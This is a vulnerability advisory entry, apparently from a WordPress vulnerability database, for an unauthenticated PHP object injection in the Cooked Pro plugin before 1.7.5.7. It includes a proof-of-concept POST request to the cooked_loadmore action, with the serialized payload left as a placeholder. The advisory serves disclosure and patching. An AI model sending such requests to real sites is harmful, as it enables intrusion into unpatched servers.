WordPress Plugin Vulnerabilities
Cooked Pro < 1.7.5.7 - Unauthenticated PHP Object Injection
Description
The plugin does not properly validate or sanitize the recipe_args parameter before unserializing it in the cooked_loadmore action, allowing an unauthenticated attacker to trigger a PHP Object injection vulnerability.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 769 Connection: close action=cooked_loadmore&atts%5Bcategory%5D=false&atts%5Border%5D=false&atts%5Borderby%5D=false&atts%5Bshow%5D=false&atts%5Bsearch%5D=true&atts%5Bpagination%5D=true&atts%5Bcolumns%5D=3&atts%5Blayout%5D=modern&atts%5Bauthor%5D=&atts%5Bcompact%5D=false&atts%5Bhide_browse%5D=false&atts%5Bhide_sorting%5D=false&atts%5Bexclude%5D=false&atts%5Binline_browse%5D=false&atts%5Bcuisine%5D=false&atts%5Bcooking-method%5D=false&atts%5Btag%5D=false&recipe_args=<SERIALIZED_PHP_OBJECT>&page=1&is_own_profile=
Affects Plugins
Fixed in version 1.7.5.7
References
Classification
Miscellaneous
Original Researcher
Marcin Motwicki
Submitter
Marcin Motwicki
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-11-21 (about 10 months ago)
Added
2022-11-21 (about 10 months ago)
Last Updated
2023-06-12 (about 3 months ago)